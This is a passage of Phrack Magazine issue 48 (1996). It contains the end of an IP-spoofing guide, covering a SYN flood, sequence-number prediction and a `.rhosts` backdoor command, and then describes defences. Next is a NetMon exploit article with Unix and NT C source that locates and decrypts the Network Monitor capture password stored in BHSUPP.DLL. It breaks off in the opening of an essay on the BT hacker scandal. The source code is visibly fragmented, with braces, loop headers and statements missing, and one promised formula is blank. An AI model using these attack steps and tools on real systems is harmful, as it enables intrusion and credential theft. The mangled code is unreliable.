                (1) trusted host
                (1) attacking host (with root access)
                (1) IP-spoofing software

Generally the attack is made from the root account on the attacking
host against the root account on the target.  If the attacker is
going to all this trouble, it would be stupid not to go for root.
(Since root access is needed to wage the attack, this should not
be an issue.)

        --[ IP-Spoofing is a 'Blind Attack' ]--

        One often overlooked, but critical factor in IP-spoofing
is the fact that the attack is blind.  The attacker is going to be
taking over the identity of a trusted host in order to subvert the
security of the target host.  The trusted host is disabled using the
method described below.  As far as the target knows, it is carrying on
a conversation with a trusted pal.  In reality, the attacker is
sitting off in some dark corner of the Internet, forging packets
puportedly from this trusted host while it is locked up in a denial
of service battle.  The IP datagrams sent with the forged IP-address
reach the target fine (recall that IP is a connectionless-oriented
protocol--  each datagram is sent without regard for the other end)
but the datagrams the target sends back (destined for the trusted
host) end up in the bit-bucket.  The attacker never sees them.  The
intervening routers know where the datagrams are supposed to go.  They
are supposed to go the trusted host.  As far as the network layer is
concerned, this is where they originally came from, and this is where
responses should go.  Of course once the datagrams are routed there,
and the information is demultiplexed up the protocol stack, and
reaches TCP, it is discarded (the trusted host's TCP cannot respond--
see below).  So the attacker has to be smart and *know* what was sent,
and *know* what reponse the server is looking for.  The attacker
cannot see what the target host sends, but she can *predict* what it
will send; that coupled with the knowledge of what it *will* send,
allows the attacker to work around this blindness.

        --[ Patterns of Trust ]--

        After a target is choosen the attacker must determine the
patterns of trust (for the sake of argument, we are going to assume
the target host *does* in fact trust somebody.  If it didn't, the
attack would end here).  Figuring out who a host trusts may or may
not be easy.  A 'showmount -e' may show where filesystems are
exported, and rpcinfo can give out valuable information as well.
If enough background information is known about the host, it should
not be too difficult.  If all else fails, trying neighboring IP
addresses in a brute force effort may be a viable option.

        --[ Trusted Host Disabling Using the Flood of Sins ]--

        Once the trusted host is found, it must be disabled.  Since
the attacker is going to impersonate it, she must make sure this host
cannot receive any network traffic and foul things up.  There are
many ways of doing this, the one I am going to discuss is TCP SYN
        A TCP connection is initiated with a client issuing a
request to a server with the SYN flag on in the TCP header.  Normally
the server will issue a SYN/ACK back to the client identified by the
32-bit source address in the IP header.  The client will then send an
ACK to the server (as we saw in figure 1 above) and data transfer
can commence.  There is an upper limit of how many concurrent SYN
requests TCP can process for a given socket, however.  This limit
is called the backlog, and it is the length of the queue where
incoming (as yet incomplete) connections are kept.  This queue limit
applies to both the number of imcomplete connections (the 3-way
handshake is not complete) and the number of completed connections
that have not been pulled from the queue by the application by way of
the accept() system call.  If this backlog limit is reached, TCP will
silently discard all incoming SYN requests until the pending
connections can be dealt with.  Therein lies the attack.
        The attacking host sends several SYN requests to the TCP port
she desires disabled.  The attacking host also must make sure that
the source IP-address is spoofed to be that of another, currently
unreachable host (the target TCP will be sending it's response to
this address.  (IP may inform TCP that the host is unreachable,
but TCP considers these errors to be transient and leaves the
resolution of them up to IP (reroute the packets, etc) effectively
ignoring them.)  The IP-address must be unreachable because the
attacker does not want any host to recieve the SYN/ACKs that will be
coming from the target TCP (this would result in a RST being sent to
the target TCP, which would foil our attack).  The process is as


1       Z(x)    ---SYN--->      B

        Z(x)    ---SYN--->      B

        Z(x)    ---SYN--->      B

        Z(x)    ---SYN--->      B

        Z(x)    ---SYN--->      B


2       X    <---SYN/ACK---     B

        X    <---SYN/ACK---     B


3       X      <---RST---       B

At (1) the attacking host sends a multitude of SYN requests to the
target (remember the target in this phase of the attack is the
trusted host) to fill it's backlog queue with pending connections.
(2) The target responds with SYN/ACKs to what it believes is the
source of the incoming SYNs.  During this time all further requests
to this TCP port will be ignored.
        Different TCP implementations have different backlog sizes.
BSD generally has a backlog of 5 (Linux has a backlog of 6).  There
is also a 'grace' margin of 3/2.  That is, TCP will allow up to
backlog*3/2+1 connections.  This will allow a socket one connection
even if it calls listen with a backlog of 0.

        AuthNote: [For a much more in-depth treatment of TCP SYN
flooding, see my definitive paper on the subject.  It covers the
whole process in detail, in both theory, and practice.  There is
robust working code, a statistical analysis, and a legnthy paper.
Look for it in issue 49 of Phrack. -daemon9 6/96]

        --[ Sequence Number Sampling and Prediction ]--

        Now the attacker needs to get an idea of where in the 32-bit
sequence number space the target's TCP is.  The attacker connects to
a TCP port on the target (SMTP is a good choice) just prior to launching
the attack and completes the three-way handshake.  The process is
exactly the same as fig(1), except that the attacker will save the
value of the ISN sent by the target host.  Often times, this process is
repeated several times and the final ISN sent is stored.  The attacker
needs to get an idea of what the RTT (round-trip time) from the target
to her host is like.  (The process can be repeated several times, and an
average of the RTT's is calculated.)  The RTT is necessary in being
able to accuratly predict the next ISN.  The attacker has the baseline
(the last ISN sent) and knows how the sequence numbers are incremented
(128,000/second and 64,000 per connect) and now has a good idea of
how long it will take an IP datagram to travel across the Internet to
reach the target (approximately half the RTT, as most times the
routes are symmetrical).  After the attacker has this information, she
immediately proceeds to the next phase of the attack (if another TCP
connection were to arrive on any port of the target before the
attacker was able to continue the attack, the ISN predicted by the
attacker would be off by 64,000 of what was predicted).
        When the spoofed segment makes it's way to the target,
several different things may happen depending on the accuracy of
the attacker's prediction:
- If the sequence number is EXACTly where the receiving TCP expects
it to be, the incoming data will be placed on the next available
position in the receive buffer.
- If the sequence number is LESS than the expected value the data
byte is considered a retransmission, and is discarded.
- If the sequence number is GREATER than the expected value but
still within the bounds of the receive window, the data byte is
considered to be a future byte, and is held by TCP, pending the
arrival of the other missing bytes.  If a segment arrives with a
sequence number GREATER than the expected value and NOT within the
bounds of the receive window the segment is dropped, and TCP will
send a segment back with the *expected* sequence number.

        --[ Subversion... ]--

        Here is where the main thrust of the attack begins:


1       Z(b)    ---SYN--->      A

2       B     <---SYN/ACK---    A

3       Z(b)    ---ACK--->      A

4       Z(b)    ---PSH--->      A


The attacking host spoofs her IP address to be that of the trusted
host (which should still be in the death-throes of the D.O.S. attack)
and sends it's connection request to port 513 on the target (1).  At
(2), the target responds to the spoofed connection request with a
SYN/ACK, which will make it's way to the trusted host (which, if it
*could* process the incoming TCP segment, it would consider it an
error, and immediately send a RST to the target).  If everything goes
according to plan, the SYN/ACK will be dropped by the gagged trusted
host.  After (1), the attacker must back off for a bit to give the
target ample time to send the SYN/ACK (the attacker cannot see this
segment).  Then, at (3) the attacker sends an ACK to the target with
the predicted sequence number (plus one, because we're ACKing it).
If the attacker is correct in her prediction, the target will accept
the ACK.  The target is compromised and data transfer can
commence (4).
        Generally, after compromise, the attacker will insert a
backdoor into the system that will allow a simpler way of intrusion.
(Often a `cat + + >> ~/.rhosts` is done.  This is a good idea for
several reasons: it is quick, allows for simple re-entry, and is not
interactive.  Remember the attacker cannot see any traffic coming from
the target, so any reponses are sent off into oblivion.)

        --[ Why it Works ]--

        IP-Spoofing works because trusted services only rely on
network address based authentication.  Since IP is easily duped,
address forgery is not difficult.  The hardest part of the attck is
in the sequence number prediction, because that is where the guesswork
comes into play.  Reduce unknowns and guesswork to a minimum, and
the attack has a better chance of suceeding.  Even a machine that
wraps all it's incoming TCP bound connections with Wietse Venema's TCP
wrappers, is still vulnerable to the attack.  TCP wrappers rely on a
hostname or an IP address for authentication...


        ...A stich in time, saves nine...

        --[ Be Un-trusting and Un-trustworthy ]--

        One easy solution to prevent this attack is not to rely
on address-based authentication.  Disable all the r* commands,
remove all .rhosts files and empty out the /etc/hosts.equiv file.
This will force all users to use other means of remote access
(telnet, ssh, skey, etc).

        --[ Packet Filtering ]--

        If your site has a direct connect to the Internet, you
can use your router to help you out.  First make sure only hosts
on your internal LAN can particpate in trust-relationships (no
internal host should trust a host outside the LAN).  Then simply
filter out *all* traffic from the outside (the Internet) that
puports to come from the inside (the LAN).

        --[ Cryptographic Methods ]--

        An obvious method to deter IP-spoofing is to require
all network traffic to be encrypted and/or authenticated.  While
several solutions exist, it will be a while before such measures are
deployed as defacto standards.

        --[ Initial Sequence Number Randomizing ]--

        Since the sequence numbers are not choosen randomly (or
incremented randomly) this attack works.  Bellovin describes a
fix for TCP that involves partitioning the sequence number space.
Each connection would have it's own seperate sequence number space.
The sequence numbers would still be incremented as before, however,
there would be no obvious or implied relationship between the
numbering in these spaces.  Suggested is the following formula:


Where M is the 4 microsecond timer and F is a cryptographic hash.
F must not be computable from the outside or the attacker could
still guess sequence numbers.  Bellovin suggests F be a hash of
the connection-id and a secret vector (a random number, or a host
related secret combined with the machine's boot time).

                [SECTION IV.  SOURCES]

        -Books:         TCP/IP Illustrated vols. I, II & III
        -RFCs:          793, 1825, 1948
        -People:        Richard W. Stevens, and the users of the
                        Information Nexus for proofreading
        -Sourcecode:    rbone, mendax, SYNflood

This paper made possible by a grant from the Guild Corporation.


                      	   ==Phrack Magazine==

             Volume Seven, Issue Forty-Eight, File 15 of 18

		Windows NT Network Monitor Exploitation

		         NetMon Encryption Hammer
   		    	  by the AON and Route 
			   for Phrack Magazine
		     May 1996 Guild productions, kid

		     comments to

	   Full exploit including binary dll's and execuatables: 

	[The intro]

	The Microsoft Network Monitor is a packet sniffer that runs under NT.  
It is a very robust and versatile packet sniffer, offering much more then
simple ethernet frame capturing.  It packs a robust capture/display filter
language, powerful protocol parsers, and one snappy GUI.  NetMon is 
delivered as part of the SMS package.  The user portion of the program 
calls upon the services of the Network Monitor Agent, which is a kernel driver
that ships with NT (3.5.x for sure, but I don't know about 3.1).  The Network 
Monitor Agent also provides an interface for a remote machine to connect and 
capture local data, provided it passes authentication. To restrict access, 
Network Monitor Agent utilizes a password authentication scheme.  Access has 
two tiers: priviledge to view previously captured sessions, and priviledge to 
actually use the sniffer to place the ethernet card in promiscuous mode.  The 
acutal encrypted password is stored as a 32-byte binary string in a 
dynamically linked library file called BHSUPP.DLL.  We have written code to 
extract this password from the dll and decyrpt it; we have broken the 
Microsoft Network Monitor password authentication system.

	[The low-down]

	The encrypted string is kept as binary data in: 
%SystemRoot%\system32\BHSUPP.DLL (in a default installation at least). 
BHSUPP.DLL is known to be different sizes between versions, so we cannot look 
for the encrypted string at a specific offset each time.  Instead we must 
search for a flag, and seek 32-bytes past this flag.  The flag is the 16-byte
string: "RTSS&G--BEGIN--".  (As a matter of note, there is a terminating 
footer also: "RTSS&G--END--".)

	[The encrypted truth]

	It is a simple encryption function, that takes random length string 
and returns 256-bit encrypted output.  It may appear to be a hash, rather 
than a block cipher, but it is not.  It does take a random length input,
and produce a fixed output, but the input is always padded to 32-bytes
(with nulls if necessary).  The input to the function is a user defined
arbitrary string.  The input is truncated to 16 bytes and then to pad 
out the array, the whole original password string is concatenated  on the 
truncated version, starting at the 16th byte.  It doesn't matter if the
resulting string is longer than 32 bytes, as the cipher ignores anything
past the 32nd byte.  So: "loveKillsTheDemon" becomes: "loveKillsTheDemo" 
and then: "loveKillsTheDemoloveKillsTheDemon".  If your password is  
smaller than 16  bytes, we get the 'hole-in-password' phenomena.  Since 
the array is intialized will nulls, and the password is still folded over to 
the 16th byte, these nulls remain.  This is easily visible from the first line
of output in our exploit code.  It also accepts empty password strings 
readily, without choking, which all Microsoft products seem willing to do all 
to easily.

	[The algorithm]

	The 32-byte string is put through 32 rounds of identical operations.
The outer for loop controls the value of the byte to be XORed with the
entire array that round (except for itself, see below).  The inner loop steps
through the entire byte array.  Each byte is permuted a total of 31 times 
(The discrepency comes from the test case where i must not be equal to j in 
order for a character to be permuted.  It would make no sense to XOR a byte 
with itself).  So, there are a total of 992 operations.  The actual 
encryption algorithm is quite simple:

In C:			if(i!=j)mix[j]^=mix[i]+(i^j)+j;

In English:		if i is NOT equal to j, the j indexed char of mix is 
			assigned the value of the j indexed char of mix XORed 
			with the i indexed char of mix PLUS i XORed with j 
			PLUS j.

Mathematically:		1) i ^ j = k
			2) k + j = l
			3) l + mix[i] = m
			4) m ^ mix[j] = x


			((i ^ j) + j + mix[i]) ^ mix[j] = x 

	The methods used for obscurity are exclusive OR (XOR) and binary 
addition, (see the appendix if you are umfamiliar with these bitwise 
operations) with completely known vectors.  The only unknown in the whole 
equation is the user entered password, fleshed out to 32-bytes.  These 32
bytes are taken through 32 rounds of permutations.  Simple and concise, 
with no key material dropped, this algorithm is not lossy.  Since it is not 
lossy it is 100% reversible, both in theory and practice.  In fact, since we 
know the values of the counters i and j, throughout the entire encryption 
process, decryption is simply a matter of reproducing these values in the 
proper order.  Since the output of the encryption process is the input, 
taken through 32 rounds of identical permutations, with known vectors, 
we simply need to reverse this process.

	[The code]

	There are two versions of the exploit available.  A Windows NT version
and, for those of you without access to an expensive NT-native compiler, 
there is a Unix version as well.  The NT version is a console-based app, as
GUI code would be a waste of time.  The full package of this exploit, along
with an NT exexcutable and sample DLL's is available from: 

	[The discussion]

	The ramifications of this weak encryption in Network Monitor Agent are 
many.  First off, the developers of Network Monitor Agent *didn't* use the 
standard security mechanisms of Windows NT.  This may be because the driver is
a kernel mode driver, and in NT the kernel is a trusted enity, therefore 
the standard security API (of Win32) does not apply in the kernel making it 
harder to do user authentication.  It also appears that they were trying to 
achieve a mechanism based not on priviledge, but on knowledge.  It is very 
likely that in secured environment not all administrators should be able to 
sniff the network.  The problem is they did a *poor* job of securing a 
powerful utility.
	The most straight forward attack is use Network Monitor to sniff the 
network (where you weren't suppose to be able to) for priviledged user data or
passwords in a heterogeneous environment (since native NT networking does not 
send password information in the clear, but standard TCP traffic from Unix
is sent clear).  The rest of the attacks would come from shabby administration
, such as the administrator used the password for the admin account and the 
capture password in Network Monitor Agent (stupid, but likely) or the 
same password for Network Monitor Agent on all machines across the network.
	In order to use the exploit utility, one must have read priviledge for 
BHSUPP.DLL which is installed into %SystemRoot%\system32 by default.  This 
is not a remote attack, but rather a stepping stone to gain priviledged 
information when one is under-priviledged.

	[The moral]

	Time and time again we see either shody implementations of trusted
algorithms, or, like in this case, just plain bad cryptography.  Under ITAR,
most secure cryptographic algorithms are classified as munitions, and are not
exportable from this country.  The funny thing is, under current law, one-way
hashing functions are *not* restricted (that is why all Unix variants can ship
with the standard crypt(3) libraries and executables).  This authentication
scheme could have *easily* been replaced by MD5, the same one-way hash used
by PGP.  At least then, the complexity of an attack would be increased to
a brute-force known-plaintext sweep of key values...

	[The appendix]

	For the binary-declined...

Exclusive OR

The XOR operation is a bitwise operation with the following truth table:

	XOR| 1 | 0 |		The Exclusive OR operation simply says:
	-------------		"...Hmmm, if I have a 1 and a 0, I'll spit
	1  | 0 | 1 | 		out a 1.  Anything else, a 0..."
	0  | 1 | 0 |

Binary addition

Binary addition is analogous to base10 addition.  However, each place holds
2^n instead of 10^n...

	add| 1 | 0 | 		base10:		base2:
	-------------		    11            1011
	1  |1 0| 1 | 		   + 5          + 0101
	-------------              ---          ------
	0  | 1 | 0 |                16		 10000

This exploit made possbile by a grant from the Guild corporation.

- May 07, 1996 route/aon

	[The Sourcecode]
	[Unix Version]


Network Monitor Exploitation code, Unix version
coded by daemon9
The Guild, 1996



#define fbufsize 	8192
#define flag 		"RTSS&G--BEGIN--"
#define VERSION		"Unix version\n"
#define BUFSIZE 	48

int main()
	char *swirl(char *,int);
	char *recover(char *);
	void hexonx(char *);

	char werd[]={"\n\n\n\n.this code made possible by a grant from the Guild corporation.\n\0"};
	char *plain,*tmp,*fname,*encrypted;
	int c;

	printf("\nNetMon Password Decryption Engine ");
	printf("\t1.\t\tEncrypt a plaintext password from STDIN.\n");
	printf("\t2.\t\tDecrypt a plaintext password from the dll.\n");
	tmp=(char *)malloc(10); 	/* Can't switch getchar() as it locks the */
	bzero(tmp,10); 			/* fucking stream and makes futher I/O buggy*/
		case 1:
			printf("Enter password to be encrypted (note echo is on, as it would be a moot point\nto turn it off)\n->");
			plain=(char *)malloc(BUFSIZE);
		case 2:
			printf("Enter name and path of DLL [./BHSUPP.DLL]:");
			fname=(char *)malloc(BUFSIZE);
				printf("Could not locate flag\n");
	return 0;	

swirl is the encryption/decryption function.  It takes an arbitrary length
string and, depending on the value of the mode variable, encrypts it or
decrypts it.  It returns a pointer to the string.

char *swirl(byteStr,mode)
char *byteStr;
int mode;
	int i=0,j=0;
	char *mix,roundAndround[32][32];
	void hexonx(char *);

	mix=(char *)malloc(sizeof(byteStr));

		memset(mix,0,32);			/* set 32 bytes of memory to 0 */
		strncpy(mix,byteStr,16);          	/* copy the first 16 bytes of the password into the mix*/
		memcpy(&mix[16],byteStr,strlen(byteStr));   /* copy password into the 16th char of the mix; if mix and plain overlap, problems occur */

		printf("Password upon entering encryption rounds:\n");
		printf("\n\nbeginning 32 rounds of 'encryption'\n");
			mix[j]^=mix[i]+(i^j)+j;			/* Sekret Enkripsion occurs here... */
			memcpy(&roundAndround[i][0],mix,32);	/* save a copy of each round */
		printf("\nDo you wish to view the encryption process round by round?[y]");
			case 'N':
			case 'Y':
				printf("round %d:\n",i+1);     	/* print the rounds out in hex */
		printf("\nEncrypted output:\n");
		printf("\n\n\nThe plaintext is: %s\nIn hex:\n",mix);

hexonx simply prints out 32 bytes of hexidecimal characters.

void hexonx(byteStr)
char *byteStr;
	int i=0;
	for(;i<32;i++)printf("0x%x ",byteStr[i]);

recover attempts to read the encrypted string from the dll 

char *recover(fname)
char *fname;

	char buffer[fbufsize],*pass;
	int fd,i=0,j=0,demonFlag=0,offset,bufOffset=0;

		fprintf(stderr,"Cannot open %s\n",fname);
					case 'R':
	/* Password is 32 bytes past end of header */	offset=j-4;
							printf("Encrypted Token Flag: '%s' located at offset 0x%x\n",flag,offset);
							printf("Encrypted password should be located at offset 0x%x\n",offset+48);
	pass=(char *)malloc(BUFSIZE);
	printf("\nDo you wish to view the encrypted password?[y]");
			case 'N':
			case 'Y':

	[The Sourcecode]
	[NT Version]

//	A Guild Production  1996  //
//	Constructed by AON  //

#define STRICT
#define MAX_FILE_SIZE 24576						//if BHSUPP.DLL grows, so must this
#include <windows.h>
#include <stdio.h>

void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword);
BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE lpEncryptedPassword);
void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile);

HANDLE g_hStdIn, g_hStdOut;						//global declaration of StandardIN and OUT

//	This is a console app.  ReadFile and WriteFile used throughout so StdIN and StdOUT
//  can be redirected.

void main(int argc, char* argv[])			
	HANDLE hTargetFile;						
	BYTE lpEncryptedPassword[32];		
	char lpszPlaintextPassword[17] = {0};
	char lpszOutputBuffer[80];
	char lpszTargetFile[MAX_PATH] = {0};
	char lpszUsage[] = "\nUsage: NMCrack [path to BHSUPP.DLL including filename]\n";
	LPTSTR lpszSystemDirectory = NULL;
	UINT nCount, nCount2;
	//set global handles
	g_hStdIn = GetStdHandle(STD_INPUT_HANDLE);	
	g_hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);

	//check for standard NT help switch
	if(argc > 1 && argv[1][0] == '/' && argv[1][1] == '?')
		//display usage info
		WriteFile(g_hStdOut, lpszUsage, sizeof(lpszUsage), &nCount, NULL);
		//exit with success
	//if path and file name not specified on commandline try system directory first, because
	//BHSUPP.DLL is probably there
	if(argc == 1)
		//findout how long path is for mem alloc
		nCount = GetSystemDirectory(lpszSystemDirectory, 0);	
		//do alloc of that size
		lpszSystemDirectory = malloc(nCount);		
		if(lpszSystemDirectory == NULL)
			WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", 
					  41, &nCount, NULL);


		//get system dir
		GetSystemDirectory(lpszSystemDirectory, nCount);		
		//append file name to system directory
		sprintf(lpszTargetFile, "%s\\bhsupp.dll", lpszSystemDirectory);
		//release memory
		//get the commandline input
		strcpy(lpszTargetFile, argv[1]);

	//try to open BHSUPP.DLL in the system dir or where the user instructed
	hTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ | 

	//if not on the commandline or in the system dir ask user for path
	if(hTargetFile == INVALID_HANDLE_VALUE && argc == 1)
		GetTargetFileFromUser(&hTargetFile, lpszTargetFile);
	//user gave bad path or they don't have read permission on the file
	else if(hTargetFile == INVALID_HANDLE_VALUE)
		//make error string because file open failed
		nCount2 = sprintf(lpszOutputBuffer, "\nUnable to open %s\n", lpszTargetFile);

		//write out
		WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL);
		//exit with failure

	//retrieve the encrypted password from BHSUPP.DLL
	if(!GetEncryptedPassword(hTargetFile, lpEncryptedPassword))
		WriteFile(g_hStdOut, "Unable to retrieve encrypted password\n",
				  39, &nCount, NULL);


	//cleanup handle

	//do the decryption here
	DecryptPassword(lpEncryptedPassword, lpszPlaintextPassword);

	//prepare for and print out results
	nCount2 = sprintf(lpszOutputBuffer, 
					  "\nThe Network Monitor Agent capture password is %s\n",

	WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL);

	//close StandardIN and StandardOUT handles


	//exit with success

//Ah yeah, here it is.
void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword)
    register int outer, inner;

    //go backwards through loops to undo XOR
	for ( outer = 31; outer >= 0; outer-- )
        for ( inner = 31; inner >= 0; inner-- )
            if ( outer != inner )
				lpEncryptedPassword[inner] ^= lpEncryptedPassword[outer] + 
											  (outer ^ inner) + inner;

    //since the original password was folded to fill 32 bytes only copy the first 16 bytes
	memcpy(lpszPlaintextPassword, lpEncryptedPassword, 16);

	//zero terminate this baby just incase it is actually a 16 byte password (yeah, right!)
	lpszPlaintextPassword[16] = 0L;


//	get the path and file name for BHSUPP.DLL from the user in the case that it was
//  a custom install
void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile)
	char lpszPrompt[] = "\nFull path to BHSUPP.DLL including file name: ";
	UINT nCount;

	WriteFile(g_hStdOut, lpszPrompt, sizeof(lpszPrompt), &nCount, NULL);

	ReadFile(g_hStdIn, lpszTargetFile, MAX_PATH, &nCount, NULL);

	//I had to account for the CR + LF that ReadFile counts in the nCount return value,
	//so I can zero terminate this string.
	lpszTargetFile[nCount - 2] = 0L;
	*phTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ | 

	//too lazy to make the error message report the actual path and file name tried 
	if(*phTargetFile == INVALID_HANDLE_VALUE)
		WriteFile(g_hStdOut, "Unable to open BHSUPP.DLL\n",
				  26, &nCount, NULL);


//	This function allocs one big buffer and reads the whole damn DLL into it.
//	There is a flag string that marks the start of the section that contains the 
//	encrypted passwords (in the case that there is a display password too), so
//	we search for the first and last characters in the string.  If we hit on a match
//	we check about 50% of the chars in the string for a match.  This is a good
//	enough check based looking at the data.  I guess I could optimize memory usage 
//  here too, but 24K is not very much these days, so fuck it.
BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE lpEncryptedPassword)				   
	LPBYTE lpSearchBuffer;
	UINT nCount, i;

	//do the big buffer alloc
	lpSearchBuffer = malloc(MAX_FILE_SIZE);

	if(lpSearchBuffer == NULL)
		WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", 
				  41, &nCount, NULL);


	//read in the entire file.  It is small enough that this takes trivial time to complete.
	ReadFile(hTargetFile, lpSearchBuffer, MAX_FILE_SIZE, &nCount, NULL);
	//do search for RTSS&G--BEGIN--  When it is found move 48 bytes past the R and copy
	//the encrypted password into the workspace
	for(i=0; i<nCount; i++)
		if(lpSearchBuffer[i] == 'R' && lpSearchBuffer[i+14] == '-')
			if(lpSearchBuffer[i+1] == 'T' && lpSearchBuffer[i+2] == 'S' &&
			   lpSearchBuffer[i+3] == 'S' && lpSearchBuffer[i+4] == '&' &&
			   lpSearchBuffer[i+8] == 'B')
				//found password and coping it into the workspace
				memcpy(lpEncryptedPassword, &lpSearchBuffer[i+48], 32);
				//cleanup the mem alloc

				//return with success
				return TRUE;

	//it failed to find the marker string
	return FALSE;


                              ==Phrack Magazine==

                 Volume Seven, Issue Forty-Eight, File 16 of 18

                   -a story of the 'BT-Hacker' scandal.

                               By Steve Fleming

Sitting in a chilly university computer department in northern England
was in itself exhilarating.  The mid-February climate made it cold; my
head was buzzing with voices chatting freely about gaining access to
secret computers, acquiring free telephone calls and how to fashion
'bombs' to maim or kill lecturers and 'Senior Vice Principles'.  There
was nobody else in the room, all the company was just under a meter from
me in CyberSpace, that alternative universe where anything is possible
and everyone is somebody they want to be.  The stories were
extraordinary - in fact they were incredible, an eclectic mix of fact
and fantasy bound together by expert social engineering.

These CyberSpace 'cafes' are the BBS' - Bulletin Board Services - and
are the stock-in-trade of the electronic community.  The Internet is
connected to some of them, but the best ones, the ones with the best
chat and the most exciting files are not - you get the dial-in number
from another user, and have to then beg to use the service.  It is
interesting to note that the Internet has now become a generic term for
on-line communication and suffers as a result of its inappropriate use.
Blaming the Internet for anything is like apportioning culpability to
'society' - fine for academics but otherwise a shallow construct.

I have known some computer experts in my time, and still some 'reformed
hackers' count as my best friends - I really wanted to find out if a
major British computer could be hacked or if it had been done.  The UK
has some of the most draconian secrecy laws anywhere on the planet, so
if secrets are found, they tend to be kept secret.  When people start
talking in CyberSpace, they really talk and talk and talk.  Their voice
has no tone or volume, no emotion or mood - it can be like talking with
a form of electronic psychopath sometimes.  But there are inventive
ideas 'on-line', and sometimes you can SHOUT, but this is quite rude,
mostly pictorial punctuation (the smiley) is the key.  You can indicate
a smile :-)  or a frown {:-(  and you can even indicate sarcasm ;-) with
a sly wink.  It's interesting to note that irony is not really a north
American thing at all;  sarcasm is a CyberSpace thing. I wouldn't say
that I am an expert, I wouldn't even say that I was very good with
computers, I'm always learning.  My qualifications are in science;
Biology and Psychology, not computing.  What this gives me is an urge to
investigate assuming a null hypothesis - I disprove things in short.
It's funny to think that most of the press followed a placed PR line
that I must be a '... twisted computer boffin who had broken into an
'...entirely robust...' computer system'.  And my, did that title stick
- friends from Hong Kong to Turkey called to say I was a computer expert
all over the world!  This was very effective and obviously placed by
someone with powerful influence, perhaps advertising influence?  It
doesn't really matter, bad journalism is all over and we all have a
living to earn - I however, would never do it at the expense of a

There was the vision of news editors screaming, "... get me some
secrets!" - they simply couldn't believe that a freelance with only a
few published pieces could have brought in such an impressive story with
a scandal at every level - so they capitulated with the 'boffin' lie and
went back to boring, standard, sloppy 'background' on this 'hacker'.  It
was actually a bit of a personal tragedy, my on-line persona was
cracked, there wasn't very much in my life at all, quite a boring person
really; like most journalists who spend a lot of time observing rather
than doing.  The Today newspaper had some hot tip-off's from people I'd
interviewed in the past, one man in particular who had lied in a silky
and attractive way for two and a half hours had been doing the same to
them.  The fact that I wrote for a 'gay magazine'.  Shock horror, a
definite Philby, Burgess & McLean story breaking.  What a bit of
investigate journalism that wasn't, I wrote under my own name!  Was he a
spy, was he working for Libya, Israel, MI-6, MI-5, the Labour Party,
Duncan Campbell, Richard Gott... and then there was the 'shit-bagging'.
This happens when tardy investigators are ignorant of the facts,
automatically they assume it should be them who had the story, if only
they'd had the time.  But this is all history now, and I forgive them
all... but I never forget.

How could a temporary member of staff see all this secret information?
The list forming in the mind of the press (and I do think in situations
like these one surprisingly tiny mind) went something like this:

1.	They aren't secrets at all.

2.      BT would know if anyone had looked at the secret stuff, so
        they'll catch the whistle-blower; probably working for computer
        security within BT.

3.      Fleming is a computer expert, he's hacked the system and is
        spinning a story to prevent him being found out - and he's not a
        'real' journalist and we are.

Well, there was clear evidence that the stuff was very sensitive, so
strike number 1 from the list.  How could they wait for stage two, if it
is the case it may take days or weeks, so they couldn't have that -
anyway the Independent had shown it could be done away in time or place
of Fleming.  The only option was;  who's there, who'll talk, and how can
we retain credibility as journalists - repudiate the freelance!

There was no shortage of shit-bag material; 'various anonymous
sources... unconfirmed reports... it seems likely etc.'  Some even
fancied the idea that the details were shocking, but lets just do it all
ourselves and dump on Fleming from a great height?  It really was like
being on a maggot farm, wading through pen after pen of repulsive,
brainless, panicked... maggots.

The truth is that there was no great skill involved in cracking BT's
computer, it was so easy my pet parrot could have done it with only one
claw.  Many companies are confused about computer security and what it
means.  The sharp young suits talk about 'magneto-optical storage
facilities' and 'EPROM or WORM access'.  The captains of industry nod
sagely, they run the ship and leave the deck scrubbing to junior
officers.  These proud, self important and generally thick as two short
planks when it comes to computers men, authorise huge budgets for the
whiz-kids who play with the money, buy new things, install new software,
'patch' the operating system, attach ISDN cards, issue user ID's after
extensive family checks.  You name it, and these guys do it, and they
love it.  They install password checkers that look for hackers (or
errors) and disconnect users for 15 minutes if they get their passwords
wrong three times.  The captains of industry still discuss 'wireless'
and 'word processors'.  The bright young men should be allowed to deal
with all the computer stuff, it's not that the captains can't understand
it or anything like that, they just don't have the time.

Staff who have to work the systems couldn't care less about the
'advanced software engineering' that went into the system.  There is as
much 'social engineering' as any other sort when it comes to computers
for industry.  So they have to remember passwords that change regularly
and they have to remember to get that report done, and see the boss and
train the new staff and type that letter and claim those expenses and
design that form and... it's a lot to remember.  When folk have a lot to
remember they make lists, and those lists include passwords - sounds
like an opportunuty for 'trashing'.  They simply look through the
rubbish and see what they can see.  Sometimes someone writes down a
password on a post-it note to let someone into their computer for some
reason, that person enters the password and makes a note in their diary
of it and pops  the sticky in the bin.  Then, in these busy offices,
staffing levels are being cut.  The  managers need a dozen staff, and
have four.  They are allowed to contract from a temp agency and top up
the office. These people are often unemployed graduates.  Clever, but
very, very bored.  They don't get paid much, 4.00 an hour.  That's what
I was paid to write a nationwide database suite for BT but there I have
to stop, the gag is cutting into me.  They just want a decent job, and
try to impress in case they get offered one, and the companies play on
this and exploit without mercy.  4.00 an hour and they want unbridled
enthusiasm, ideas, loyalty, commitment - who are they trying to kid!

The computer administrators say they can't give temporary access to the
system, '... it can't be done.'  Well what do you suggest?  'You'll just
have to make do, it's the system, can't help, sorry.'  You need a dozen
workers, perhaps 6 need to be on the system, you have 5 passwords plus
another of the departmental manager making six.  Why not let the temps
use these passwords and you can get on with the more important stuff,
can't be any harm in that?  It's not as if we're using them?  However,
temps are just that, temporary - they move on.  Consequently with all
the changes you make up a folder with all the passwords and then they
can just flick through that to find a password, it doesn't seem all that
insecure does it?

And there we have it, passwords being shared, passed, written down,
